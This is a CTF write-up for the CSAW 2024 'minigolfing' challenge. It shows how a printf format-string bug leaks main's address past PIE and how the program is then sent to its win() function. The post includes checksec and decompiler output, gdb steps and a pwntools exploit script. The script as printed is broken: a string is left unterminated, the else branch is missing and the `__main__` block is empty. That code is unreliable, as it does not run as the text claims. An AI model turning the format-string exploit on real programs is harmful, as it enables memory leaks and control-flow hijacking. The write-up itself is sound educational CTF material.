
Leaky stacks with printf: format string basics

Looking at the Problem

We’re providing with a binary golf so let’s first begin by seeing what protections we’re working with.

$ checksec ./golf
[*] '/home/zerodaytea/CTFs/csaw2024/minigolfing/golf'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

And let’s take a look at the decomp as well with Binary Ninja A photo of the decomp

Only two functions are of particular notice that being main() and win(). The win() function clearly reads the flag file but is never called explicitly so it looks like we’ll need to find a way to jump to it.

Fortunately at the end of main(), scanf() is used to read in an address and then jump to it with the following code segment

00001360      __isoc99_scanf(&data_2094, &var_18);
00001365      int64_t rax_5 = var_18;
0000137c      printf("Ok jumping to that address...");
00001385      rax_5();

Unfortunately for us, however, as we saw earlier, PIE is enabled on the binary meaning the position of the binary in memory will be randomized every time it is started. We’ll need to find a way to leak the address of win() in order to pass it into scanf().

Fortunately, there appears to be a simple format string printf vulnerability in

00001309      fgets(&var_518, 0x400, stdin);
0000131d      printf("hello: ");
00001331      printf(&var_518);

As printf() is called on our input with no format specifier, we can pass our own format specifier as input and leak values earlier on the stack. Since win() is never invoked, it’s address will likely not be anywhere on the stack, but the address of main() surely will be and we can use the fact that win() and main() will always be at consistent offsets away from each other to our advantage.

I’ll use gdb and pass in the %p format specifier to leak stack data as pointers. Looking at the address space with info proc mappings we see memory space So we should be looking for addresses of the format 0x55555555...

Passing in as many %p’s into the printf call as we can we can then start looking for something matching. Note that this can be more easily done but just iterating with %{i}$p until we find something like the address of main but because our buffer is big enough here this works as well.

format string We can use info functions main in gdb to get the address of main and win

pwndbg> info functions main
All functions matching regular expression "main":
Non-debugging symbols:
0x0000555555555223  main
pwndbg> info functions win
All functions matching regular expression "win":
0x0000555555555209  win

Looking back at our leaked addresses we spot 0x555555555223 as the 177th address printed (quick trick is to count the number of periods appearing between the stack leaks).

Now we now that even outside of gdb we can always always use the format specifier %177$p to leak the address of main. Since we see that win() is just 0x555555555223 - 0x555555555209 = 0x1a offset away from main() we can simply leak the address of main and use the offset to calculate the address we want to jump to.

Writing up our solve script to do just that we get something like

#!/usr/bin/env python3

from pwn import *

elf = ELF("./golf")
context.binary = elf

def conn():
    if args.GDB:
        script = """
        br main
        p = gdb.debug(elf.path, gdbscript=script)
    elif args.REMOTE:
        p = remote("addr", 1337)
        p = process(elf.path)
    return p

def main():
    p = conn()

    p.sendlineafter("name?", "%177$p")
    output = p.recvline()
    main_addr = output.strip()[7:]
    main_addr_int = int(main_addr, 16)
    win_addr_int = main_addr_int - 0x1a
    win_addr = hex(win_addr_int)

    p.sendlineafter("aim at!:", win_addr)


if __name__ == "__main__":

If you are unfamiliar with pwntools scripts just take note of the main function where the program is started up, the format specifier is sent, the address of main is parsed from the result, the offset is subtracted, and the resulting address is sent back to the running binary.

Running our solve we get a flag!

$ python3 solve.py 
[*] '/home/zerodaytea/CTFs/csaw2024/minigolfing/golf'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[+] Starting local process '/home/zerodaytea/CTFs/csaw2024/minigolfing/golf': pid 29025
[*] Switching to interactive mode
 Ok jumping to that address...csawctf{test_flag}
[*] Got EOF while reading in interactive

Simply replacing the p = remote() call above we can leak the remote flag just as easily.


Patrick Dobranowski

Making and breaking things around the world since before Pluto lost its planet status. Just your average spray-on-cheese hater navigating this complex reality by a love of cybersecurity, machine learning, low-level architecture, physics, and tea that makes you think everything will be alright.

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